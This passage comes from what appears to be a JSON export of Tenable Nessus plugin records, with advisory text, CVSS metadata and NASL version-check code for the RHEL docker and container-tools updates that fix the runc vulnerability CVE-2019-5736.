appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:rhel8');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'buildah / container-selinux / containernetworking-plugins / etc');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T05:43:32", "description": "An update for docker is now available for Red Hat Enterprise Linux 7\nExtras.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nDocker is an open source engine that automates the deployment of any\napplication as a lightweight, portable, self-sufficient container that\nruns virtually anywhere.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. (CVE-2019-5736)\n\nAdditional details about this flaw, including mitigation information,\ncan be found in the vulnerability article linked from the Reference\nsection.\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 20, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-02-12T00:00:00", "title": "RHEL 7 : docker (RHSA-2019:0304)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:docker", "p-cpe:/a:redhat:enterprise_linux:docker-lvm-plugin", "p-cpe:/a:redhat:enterprise_linux:docker-debuginfo", "p-cpe:/a:redhat:enterprise_linux:docker-common", "p-cpe:/a:redhat:enterprise_linux:docker-logrotate", "p-cpe:/a:redhat:enterprise_linux:docker-rhel-push-plugin", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:docker-client", "p-cpe:/a:redhat:enterprise_linux:docker-novolume-plugin", "p-cpe:/a:redhat:enterprise_linux:docker-v1.10-migrator"], "id": "REDHAT-RHSA-2019-0304.NASL", "href": "https://www.tenable.com/plugins/nessus/122111", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0304. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122111);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"RHSA\", value:\"2019:0304\");\n\n script_name(english:\"RHEL 7 : docker (RHSA-2019:0304)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for docker is now available for Red Hat Enterprise Linux 7\nExtras.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nDocker is an open source engine that automates the deployment of any\napplication as a lightweight, portable, self-sufficient container that\nruns virtually anywhere.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. (CVE-2019-5736)\n\nAdditional details about this flaw, including mitigation information,\ncan be found in the vulnerability article linked from the Reference\nsection.\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/runcescape\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-5736\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-logrotate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-lvm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-novolume-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-rhel-push-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-v1.10-migrator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (rpm_exists(release:\"RHEL7\", rpm:\"atomic-openshift-\")) exit(0, \"OpenShift 3.x is installed, implying SELinux is active in enforcement mode, implying that the RHEL7 system is not vulnerable.\");\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0304\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-client-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-client-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-common-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-common-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-debuginfo-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-debuginfo-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-logrotate-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-logrotate-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-lvm-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-lvm-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-novolume-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-novolume-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-rhel-push-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-rhel-push-plugin-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"docker-v1.10-migrator-1.13.1-91.git07f3374.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-v1.10-migrator-1.13.1-91.git07f3374.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker / docker-client / docker-common / docker-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T17:57:05", "description": "An update for the container-tools:rhel8 module is now available for\nRed Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe container-tools module contains tools for working with containers,\nnotably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. (CVE-2019-5736)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* [stream rhel8] rebase container-selinux to 2.94 (BZ#1693675)\n\n* [stream rhel8] unable to mount disk at `/var/lib/containers` via\n`systemd` unit when `container-selinux` policy installed (BZ#1695669)\n\n* [stream rhel8] don't allow a container to connect to random services\n(BZ# 1695689)", "edition": 11, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-05-07T00:00:00", "title": "RHEL 8 : container-tools:rhel8 (RHSA-2019:0975)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-05-07T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:slirp4netns-debugsource", "p-cpe:/a:redhat:enterprise_linux:buildah-debugsource", "p-cpe:/a:redhat:enterprise_linux:oci-umount", "p-cpe:/a:redhat:enterprise_linux:runc-debugsource", "p-cpe:/a:redhat:enterprise_linux:oci-umount-debugsource", "p-cpe:/a:redhat:enterprise_linux:podman-debugsource", "p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs-debugsource", "p-cpe:/a:redhat:enterprise_linux:podman", "p-cpe:/a:redhat:enterprise_linux:runc", "p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook-debugsource", "p-cpe:/a:redhat:enterprise_linux:skopeo-debugsource", "cpe:/a:redhat:enterprise_linux:8::appstream", "p-cpe:/a:redhat:enterprise_linux:buildah", "p-cpe:/a:redhat:enterprise_linux:container-selinux", "p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook", "cpe:/o:redhat:enterprise_linux:8.0", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins", "p-cpe:/a:redhat:enterprise_linux:skopeo", "p-cpe:/a:redhat:enterprise_linux:containers-common", "p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debugsource", "p-cpe:/a:redhat:enterprise_linux:podman-docker", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:slirp4netns"], "id": "REDHAT-RHSA-2019-0975.NASL", "href": "https://www.tenable.com/plugins/nessus/124666", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:0975. The text\n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124666);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/22\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"RHSA\", value:\"2019:0975\");\n\n script_name(english:\"RHEL 8 : container-tools:rhel8 (RHSA-2019:0975)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for the container-tools:rhel8 module is now available for\nRed Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe container-tools module contains tools for working with containers,\nnotably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. (CVE-2019-5736)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* [stream rhel8] rebase container-selinux to 2.94 (BZ#1693675)\n\n* [stream rhel8] unable to mount disk at `/var/lib/containers` via\n`systemd` unit when `container-selinux` policy installed (BZ#1695669)\n\n* [stream rhel8] don't allow a container to connect to random services\n(BZ# 1695689)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-5736\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:buildah\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:buildah-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:container-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containers-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-umount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:oci-umount-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:podman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:podman-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:podman-docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:skopeo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:skopeo-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:slirp4netns\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:slirp4netns-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/container-tools');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:rhel8');\nif ('rhel8' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module container-tools:' + module_ver);\n\nappstreams = {\n 'container-tools:rhel8': [\n {'reference':'buildah-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'buildah-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'buildah-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'buildah-debugsource-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'buildah-debugsource-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'buildah-debugsource-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'container-selinux-2.94-1.git1e99f1d.module+el8.0.0+2958+4e823551', 'release':'8', 'epoch':'2'},\n {'reference':'containernetworking-plugins-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'containernetworking-plugins-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'containernetworking-plugins-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'containernetworking-plugins-debugsource-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'containernetworking-plugins-debugsource-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'containernetworking-plugins-debugsource-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'containers-common-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'containers-common-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'containers-common-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'fuse-overlayfs-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'fuse-overlayfs-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'fuse-overlayfs-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'fuse-overlayfs-debugsource-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'fuse-overlayfs-debugsource-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'fuse-overlayfs-debugsource-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-debugsource-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-debugsource-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-debugsource-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-debugsource-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-debugsource-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-debugsource-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'2'},\n {'reference':'podman-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'podman-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'podman-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'podman-debugsource-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'podman-debugsource-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'podman-debugsource-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'podman-docker-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'release':'8'},\n {'reference':'runc-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 'cpu':'aarch64', 'release':'8'},\n {'reference':'runc-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 'cpu':'s390x', 'release':'8'},\n {'reference':'runc-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 'cpu':'x86_64', 'release':'8'},\n {'reference':'runc-debugsource-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 